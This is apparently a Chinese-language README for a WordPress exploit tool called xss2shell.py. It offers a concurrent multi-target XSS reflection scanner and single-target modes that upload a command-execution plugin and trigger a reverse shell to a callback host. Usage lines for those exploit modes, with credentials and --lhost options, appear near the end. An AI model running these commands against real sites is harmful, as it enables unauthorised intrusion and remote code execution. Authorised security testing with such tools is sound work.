开发者: 致谢:YogaGymn
用于 WordPress 授权安全测试的 PoC/扫描工具。该项目包含针对单一目标的利用流程,以及一个并发的仅扫描多目标模式。
重要提示: 请仅在您拥有或已获得明确测试授权的 WordPress 安装上使用此项目。多目标扫描器有意仅限于版本识别和 XSS 反射检测;它不会针对目标列表执行凭据捕获、插件上传或 RCE。
原始脚本支持:
auto、xss 和 direct 模式。新增的扫描器支持:
ThreadPoolExecutor 进行并发扫描。多目标模式不会调用原始的 RCE 函数。
requests安装依赖:
python3 -m pip install requests
如果您的 Linux 发行版使用外部管理的 Python 环境,请使用虚拟环境:
python3 -m venv .venv
source .venv/bin/activate
pip install requests
克隆或复制项目:原始 exploit 来自 yogaGymn
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638
或者直接放置:
xss2shell.py
到您的工作目录中。
创建一个名为 targets.txt OU alvos.txt 的文件:
https://example1.test
https://example2.test
https://example3.test
注释和空行将被忽略:
# Alvos de laboratório autorizado
https://example1.test
https://example2.test
运行扫描器:
python3 xss2shell.py -i targets.txt
默认并发数为 10 个 workers。
例如,使用 20 个 workers:
python3 xss2shell.py -i targets.txt --workers 20
对于小型实验室:
python3 xss2shell.py -i targets.txt --workers 5
不要选择不必要地高的 workers 数量,因为这可能会增加连接负载并触发速率限制或防御控制。
python3 xss2shell.py \
-i targets.txt \
--workers 10 \
--output results.txt
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE
[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)
=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected : 1
Not detected : 2
Errors : 0
Results saved : scan_results.txt
默认的 scan_results.txt 使用制表符分隔的字段:
TARGET WORDPRESS_VERSION XSS_STATUS XSS_DETAIL
示例:
https://example1.test 6.8.2 XSS_NOT_DETECTED ESCAPED
https://example2.test 6.7.1 XSS_REFLECTION_DETECTED AREA_BYPASS
状态 含义
XSS_REFLECTION_DETECTED 扫描器检测到所测试的
HTML 反射行为。这本身
并不能证明存在 RCE。
XSS_NOT_DETECTED 未检测到所测试的反射。
ERROR 检查过程中发生异常。扫描器可以报告如下详细信息:
RAW_HTMLAREA_BYPASSESCAPEDSTRIPPEDNOT_REFLECTED这些值描述了检测例程观察到的响应;在将结果视为已确认的漏洞之前,必须手动验证它们。
原始脚本也支持单一目标参数。
python3 xss2shell.py \
-u admin \
-p 'PASSWORD' \
http://authorized-target.test
python3 xss2shell.py \
--mode direct \
-u admin \
-p 'PASSWORD' \
http://authorized-target.test
python3 xss2shell.py \
--mode xss \
--lhost 192.0.2.10 \
http://authorized-lab.test
XSS/直接模式工作流可能会创建或激活包含命令执行功能的插件。请仅在授权的测试环境中使用它们。
usage: xss2shell.py [-h]
[-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
[--mode {auto,xss,direct}]
[-u USERNAME] [-p PASSWORD]
[--lhost LHOST] [--lport LPORT]
[--slug SLUG] [--callback-port CALLBACK_PORT]
[--no-rev]
[target]
参数 说明
target 单一目标 URL。
-i, --input 包含多个目标的文件。
--output 多目标结果的输出文件。
默认值:scan_results.txt。
--workers 并发 worker 数量。
默认值:10。
--mode 原始单一目标模式:
auto、xss 或 direct。
-u, --username WordPress 用户名,用于原始
直接/回退工作流。
-p, --password WordPress 密码,用于原始
直接/回退工作流。
--lhost 原始 PoC 的回调/反向 Shell 主机。
--lport 反向 Shell 端口。默认值:
4444。
--slug 插件 slug。默认值:xss2shell。
--callback-port 回调服务器端口。默认值:
9090。
--no-rev 在原始工作流中跳过反向
Shell 触发。多目标模式使用以下 Python 功能:
ThreadPoolExecutor
每个目标被提交为独立的扫描任务:
targets.txt
|
v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ...
+----+----+----+----+
| | | |
v v v v
WP WP WP WP
XSS XSS XSS XSS
| | | |
+----+----+----+
|
v
scan_results.txt
结果会在任务完成时被收集,而最终输出则按照目标的原始顺序生成。
多目标模式是为授权的安全评估和实验室环境而设计的。
推荐的工作流程:
targets.txt 文件中包含获得授权的域/IP。未经许可,请勿对第三方系统使用该扫描器。
该扫描器不是完整的漏洞评估工具。
特别是:
unknown(未知)状态并不意味着目标存在漏洞。.
├── xss2shell.py
├── targets.txt
└── scan_results.txt
所提供的源代码中没有任何许可证信息。
如果该项目公开发布,请添加一个明确的许可证文件,例如 LICENSE。此代码是 ZSecurity 原始代码的后续开发。